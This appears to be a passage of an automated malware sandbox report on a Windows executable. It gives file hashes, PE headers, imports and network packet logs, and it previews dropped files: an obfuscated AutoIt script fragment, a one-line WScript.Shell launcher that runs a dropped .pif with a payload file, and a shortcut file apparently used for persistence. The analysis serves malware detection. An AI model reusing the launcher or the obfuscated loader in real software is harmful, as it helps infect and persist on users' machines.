                                                          SHA-512:0AB27B367B5A9A1E4B259AC9644B1228020373E8BED53DBAC3F97FB27FAE8507BDD8A2C3496225DE74860031E3BD953D13FCD375403124182B3DD36A01C94F99
                                                          Malicious:false
                                                          Preview:Func NutritionSpeedMayorFamilies($SmKiss, $EfficientlyFormula, $ConsultingSortsLabs, $furtherterrorist, $BIKEOCCURRENCESLIGHT, $ReversePhilippines).$PdBlocksResponseDat = '739119618772'.$VerifiedUnderstoodValidation = 34.$iosymphonyseemscrucial = 50.For $OdHBt = 28 To 865.If $VerifiedUnderstoodValidation = 32 Then.Sqrt(7955).FileExists(Wales("73]113]116]120]125]36]81]36]72]109]119]116]121]120]105]36",12/3)).$VerifiedUnderstoodValidation = $VerifiedUnderstoodValidation + 1.EndIf.If $VerifiedUnderstoodValidation = 33 Then.ConsoleWriteError(Wales("75]106]103]119]122]102]119]126]48]74]125]121]119]102]48",25/5)).DriveStatus(Wales("87]72]79]72]70]82]80]80]88]81]76]70]68]87]76]82]81]86]67]71]72]86]76]85]72]67",6/2)).Dec(Wales("92]77]84]52]70]82]70]95]84]83]72]84]90]80]52]71]90]73]70]85]74]88]89]52]90]83]78]89]88]52",5/1)).$VerifiedUnderstoodValidation = $VerifiedUnderstoodValidation + 1.EndIf.If $VerifiedUnderstoodValidation = 34 Then.$NuttenInvestorsRaleigh = Dec(Wales("104]113]105]86]85]96]
                                                          Process:C:\Users\Public\Guard.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):184
                                                          Entropy (8bit):4.736154105743425
                                                          Encrypted:false
                                                          SSDEEP:3:RiMIpGXfeNH5E5wWAX+Ro6p4EkD5yKXW/Zi+0/RaMl85uWAX+Ro6p4EkD5yKXW/f:RiJbNHCwWDKaJkDrXW/Zz0tl8wWDKaJX
                                                          MD5:612D28A7A2758BAAF54DB34272446F87
                                                          SHA1:D4671632FC2141EF2AB2455F8923BC5197B2FD68
                                                          SHA-256:94A83DD87CE7268703585A40C52491DDC7D332380B82832951DED047AAE6D73A
                                                          SHA-512:B4B64908C674F92F5D4B1E761E123957E8D5CD6C3F433D2D5C6ADD19101FD0610EE968222D4CED31E8F21F7F022D880E7E723E4171BC7DB18C37A2000A58565B
                                                          Malicious:true
                                                          Preview:new ActiveXObject("Wscript.Shell").Run("\"C:\\Users\\user\\AppData\\Local\\WordGenius Technologies\\SwiftWrite.pif\" \"C:\\Users\\user\\AppData\\Local\\WordGenius Technologies\\G\"")
                                                          Process:C:\Users\Public\Guard.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):893608
                                                          Entropy (8bit):6.62028134425878
                                                          Encrypted:false
                                                          SSDEEP:12288:WpV0etV7qtINsegA/rMyyzlcqakvAfcN9b2MyZa31tqoPTdFbgawV2501:WTxz1JMyyzlohMf1tN70aw8501
                                                          MD5:18CE19B57F43CE0A5AF149C96AECC685
                                                          SHA1:1BD5CA29FC35FC8AC346F23B155337C5B28BBC36
                                                          SHA-256:D8B7C7178FBADBF169294E4F29DCE582F89A5CF372E9DA9215AA082330DC12FD
                                                          SHA-512:A0C58F04DFB49272A2B6F1E8CE3F541A030A6C7A09BB040E660FC4CD9892CA3AC39CF3D6754C125F7CD1987D1FCA01640A153519B4E2EB3E3B4B8C9DC1480558
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 8%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R.*.R.*.R.*..C..P.*....S.*._@..a.*._@....*._@..g.*.[j..[.*.[j..w.*.R.+.r.*......*....S.*._@..S.*.R...P.*....S.*.RichR.*.........................PE..L...._pZ.........."...............................@.......................................@...@.......@.........................|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B................................................................................................................................................................................................................................................................................
                                                          Process:C:\Windows\SysWOW64\cmd.exe
                                                          File Type:MS Windows 95 Internet shortcut text (URL=<"C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" >), ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):98
                                                          Entropy (8bit):4.915531212533357
                                                          Encrypted:false
                                                          SSDEEP:3:HRAbABGQaFyw3pYot+kiE2J5yKXW/Zi+URAAy:HRYF5yjowkn23yKXW/Zzyy
                                                          MD5:56D029782506F3E1F7EC40780D1DA27F
                                                          SHA1:C7E0690DE9B31C951AC212A7E940E460267F2BA1
                                                          SHA-256:5F412A72A3459ACA6A245DE1A280AB53CA5E6B306FECA32E0DF4B0B9B7863223
                                                          SHA-512:1C5F108FB4325E4B47E9EE15F5D828569EE90676D5170D6D3B92BD13BD39CCAA68657CBB97761007154C73D2FFCFA8A3582879CB2097A899B22C1C83848A9D92
                                                          Malicious:true
                                                          Preview:[InternetShortcut] ..URL="C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" ..
                                                          File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                          Entropy (8bit):6.306463308977624
                                                          TrID:
                                                          • Win64 Executable GUI (202006/5) 92.65%
                                                          • Win64 Executable (generic) (12005/4) 5.51%
                                                          • Generic Win/DOS Executable (2004/3) 0.92%
                                                          • DOS Executable Generic (2002/1) 0.92%
                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                          File name:EO3RT0fEfb.exe
                                                          File size:1'083'904 bytes
                                                          MD5:dc83439d47b35f0556beedbc95c57fc5
                                                          SHA1:a3674a56c0e6d0ce15936177efc40c0fb0ffe660
                                                          SHA256:c6a10001e9cd00207400da197bc724aed97fc6dde44c7b4b6ab7bf8c0916a429
                                                          SHA512:76f932803506303b54a1be7b2764c92909878901f3b002805c2ce263e35a1673c4033e63146aaf88a4ab7eaa7ed776d777a563380d62f833d5911610f8401f12
                                                          SSDEEP:24576:MrORE29TTVx8aBRd1h1orq+GWE0Jc5bDTj1Vyv9Tval1v:M2EYTb8atv1orq+pEiSDTj1VyvBaT
                                                          TLSH:83357C4973A4419DFEABE1B6CA23C607D6B17C490276861F01A47B767F337712A2E321
                                                          File Content Preview:MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$.......o1).+PG.+PG.+PG.....>PG......PG......PG.....*PG.y8B..PG.y8C.:PG.y8D.#PG."(..#PG."(..*PG."(...PG.+PF..RG..9I.{PG..9D.*PG..9..*PG
                                                          Icon Hash:0fd88dc89ea7861b
                                                          Entrypoint:0x14002549c
                                                          Entrypoint Section:.text
                                                          Digitally signed:false
                                                          Imagebase:0x140000000
                                                          Subsystem:windows gui
                                                          Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                          DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                          Time Stamp:0x6752C2B4 [Fri Dec 6 09:24:04 2024 UTC]
                                                          TLS Callbacks:
                                                          CLR (.Net) Version:
                                                          OS Version Major:5
                                                          OS Version Minor:2
                                                          File Version Major:5
                                                          File Version Minor:2
                                                          Subsystem Version Major:5
                                                          Subsystem Version Minor:2
                                                          Import Hash:fadc5a257419d2541a6b13dfb5e311e2
                                                          Instruction
                                                          Programming Language:
                                                          • [ C ] VS2008 SP1 build 30729
                                                          • [IMP] VS2008 SP1 build 30729
                                                          Name                                  Virtual Address  Virtual Size  Is in Section
                                                          IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
                                                          IMAGE_DIRECTORY_ENTRY_IMPORT          0xe5c10          0x17c         .rdata
                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE        0xfb000          0x140fc       .rsrc
                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION       0xf4000          0x6f48        .pdata
                                                          IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC       0x110000         0xa74         .reloc
                                                          IMAGE_DIRECTORY_ENTRY_DEBUG           0xc7050          0x1c          .rdata
                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
                                                          IMAGE_DIRECTORY_ENTRY_TLS             0xd9aa0          0x28          .rdata
                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0xc7070          0x100         .rdata
                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
                                                          IMAGE_DIRECTORY_ENTRY_IAT             0xb5000          0x1138        .rdata
                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0              0x0
                                                          IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0xb3328 | 0xb3400 | 507a8505198e35cc9675301d53e3b1c4 | False | 0.5503358721234309 | data | 6.5212967575920215 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0xb5000 | 0x34204 | 0x34400 | 9eda36be0cf076085a2f9772c1ee5803 | False | 0.30884139503588515 | data | 5.360588077813426 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xea000 | 0x9120 | 0x5000 | ec6b77d6ef8898b0d3b7d48c042d66a0 | False | 0.040673828125 | DOS executable (block device driver) | 0.5749243362866429 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.pdata | 0xf4000 | 0x6f48 | 0x7000 | 4416e27f8be9f9271c439d2fd34d1b2d | False | 0.49612862723214285 | data | 5.911479421450324 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc | 0xfb000 | 0x140fc | 0x14200 | 198dc241f7487065c4c479abbd151255 | False | 0.19349281832298137 | data | 4.2465033983096605 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x110000 | 0xa74 | 0xc00 | 5ddb0e422ace102fe530e589a0cbec6f | False | 0.4850260416666667 | data | 5.139847116863034 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0xfb458 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.7466216216216216
RT_ICON | 0xfb580 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors | English | Great Britain | 0.3277027027027027
RT_ICON | 0xfb6a8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.3885135135135135
RT_ICON | 0xfb7d0 | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 65536, resolution 60472 x 60472 px/m | English | Great Britain | 0.14468236129184905
RT_MENU | 0x10bff8 | 0x50 | data | English | Great Britain | 0.9
RT_STRING | 0x10c048 | 0x594 | data | English | Great Britain | 0.3333333333333333
RT_STRING | 0x10c5dc | 0x68a | data | English | Great Britain | 0.2735961768219833
RT_STRING | 0x10cc68 | 0x490 | data | English | Great Britain | 0.3715753424657534
RT_STRING | 0x10d0f8 | 0x5fc | data | English | Great Britain | 0.3087467362924282
RT_STRING | 0x10d6f4 | 0x65c | data | English | Great Britain | 0.34336609336609336
RT_STRING | 0x10dd50 | 0x466 | data | English | Great Britain | 0.3605683836589698
RT_STRING | 0x10e1b8 | 0x158 | Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0 | English | Great Britain | 0.502906976744186
RT_RCDATA | 0x10e310 | 0x8ce | data | | | 1.0048802129547472
RT_GROUP_ICON | 0x10ebe0 | 0x14 | data | English | Great Britain | 1.25
RT_GROUP_ICON | 0x10ebf4 | 0x14 | data | English | Great Britain | 1.25
RT_GROUP_ICON | 0x10ec08 | 0x14 | data | English | Great Britain | 1.15
RT_GROUP_ICON | 0x10ec1c | 0x14 | data | English | Great Britain | 1.25
RT_VERSION | 0x10ec30 | 0xdc | data | English | Great Britain | 0.6181818181818182
RT_MANIFEST | 0x10ed0c | 0x3ef | ASCII text, with CRLF line terminators | English | Great Britain | 0.5074478649453823
DLL | Import
WSOCK32.dll | gethostbyname, recv, send, socket, inet_ntoa, setsockopt, ntohs, WSACleanup, WSAStartup, sendto, htons, __WSAFDIsSet, select, accept, listen, bind, inet_addr, ioctlsocket, recvfrom, WSAGetLastError, closesocket, gethostname, connect
VERSION.dll | GetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
WINMM.dll | timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll | ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
MPR.dll | WNetGetConnectionW, WNetCancelConnection2W, WNetUseConnectionW, WNetAddConnection2W
WININET.dll | HttpOpenRequestW, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, InternetConnectW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetQueryDataAvailable
PSAPI.DLL | GetProcessMemoryInfo
IPHLPAPI.DLL | IcmpSendEcho, IcmpCloseHandle, IcmpCreateFile
USERENV.dll | DestroyEnvironmentBlock, LoadUserProfileW, CreateEnvironmentBlock, UnloadUserProfile
UxTheme.dll | IsThemeActive
KERNEL32.dll | WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, GetFullPathNameW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, LoadResource, LockResource, SizeofResource, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, LoadLibraryW, GetLocalTime, CompareStringW, EnterCriticalSection, DuplicateHandle, GetStdHandle, CreatePipe, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, VirtualAlloc, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, IsProcessorFeaturePresent, GetSystemTimeAsFileTime, CreateThread, GetCurrentProcess, GetCurrentThread, LeaveCriticalSection, InitializeSListHead, RtlUnwindEx, RtlPcToFileHeader, SetLastError, TlsAlloc, ResetEvent, WaitForSingleObjectEx, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, ResumeThread, FreeLibraryAndExitThread, GetACP, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetStringTypeW, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, ReadConsoleW, GetTimeZoneInformation, FindFirstFileExW, IsValidCodePage, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableA, CloseHandle, WriteConsoleW, MoveFileW, RtlCaptureContext
USER32.dll | GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, GetWindowLongW, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongPtrW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, SetWindowLongPtrW, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, GetInputState, UnregisterHotKey, CharLowerBuffW, MonitorFromPoint, MonitorFromRect, LoadImageW, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, IsCharUpperW, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, GetClipboardData, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, IsCharLowerW, IsCharAlphaNumericW, IsCharAlphaW, GetKeyboardLayoutNameW, ClientToScreen, RegisterHotKey, GetCursorInfo, SetWindowPos, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, SetMenuDefaultItem, CloseClipboard, GetWindowRect, SetUserObjectSecurity, IsClipboardFormatAvailable, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, OpenClipboard, GetWindowLongPtrW
GDI32.dll | EndPath, DeleteObject, GetDeviceCaps, ExtCreatePen, StrokePath, SetPixel, CloseFigure, LineTo, AngleArc, MoveToEx, Ellipse, PolyDraw, GetTextExtentPoint32W, CreateCompatibleBitmap, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, CreateDCW, GetPixel, DeleteDC, GetDIBits, StretchBlt, SelectObject, CreateCompatibleDC, StrokeAndFillPath
COMDLG32.dll | GetSaveFileNameW, GetOpenFileNameW
ADVAPI32.dll | GetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, RegSetValueExW, GetSecurityDescriptorDacl, GetAclInformation, RegCreateKeyExW, AddAce, SetSecurityDescriptorDacl, InitiateSystemShutdownExW, GetUserNameW
SHELL32.dll | DragFinish, DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW
ole32.dll | CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
OLEAUT32.dll | VariantChangeType, DispCallFunc, CreateStdDispatch, CreateDispTypeInfo, UnRegisterTypeLib, UnRegisterTypeLibForUser, RegisterTypeLibForUser, RegisterTypeLib, LoadTypeLibEx, VariantCopyInd, VariantTimeToSystemTime, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, VariantInit, VariantClear, VariantCopy, SysAllocString, SafeArrayCreateVector, VarR8FromDec, SafeArrayAllocDescriptorEx, SafeArrayAllocData, SysStringLen, SafeArrayGetVartype, OleLoadPicture, QueryPathOfRegTypeLib, SysReAllocString, SafeArrayAccessData
Language of compilation system | Country where language is spoken
English | Great Britain
                                                          Dec 18, 2024 09:32:35.068428040 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.068443060 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.072786093 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.072848082 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.072865009 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.077666998 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.077739954 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.077842951 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.081717014 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.081733942 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.081779003 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.086332083 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.086405039 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.086433887 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.090492964 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.090552092 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.090658903 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.094957113 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.095025063 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.095050097 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.099700928 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.099761009 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.099792004 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.104114056 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.104170084 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.104193926 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.108201027 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.108277082 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.108342886 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.112667084 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.112740040 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.112775087 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.117101908 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.117172003 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.117224932 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.121586084 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.121649981 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.121666908 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.126055956 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.126116037 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.126157045 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.172401905 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.221784115 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.221913099 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.221987963 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.223587990 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.223720074 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.223786116 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.227217913 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.227307081 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.227375031 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.230806112 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.230912924 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.230978966 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.234457970 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.234587908 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.234688044 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.238049984 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.238249063 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.238313913 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.241429090 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.241543055 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.241601944 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.244792938 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.244925022 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.244991064 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.248176098 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.248235941 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.248292923 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.251449108 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.251542091 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.251616001 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.254774094 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.254899025 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.254971027 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.257922888 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.258109093 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.258167982 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.260938883 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.261048079 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.261101007 CET4973080192.168.2.4139.99.188.124
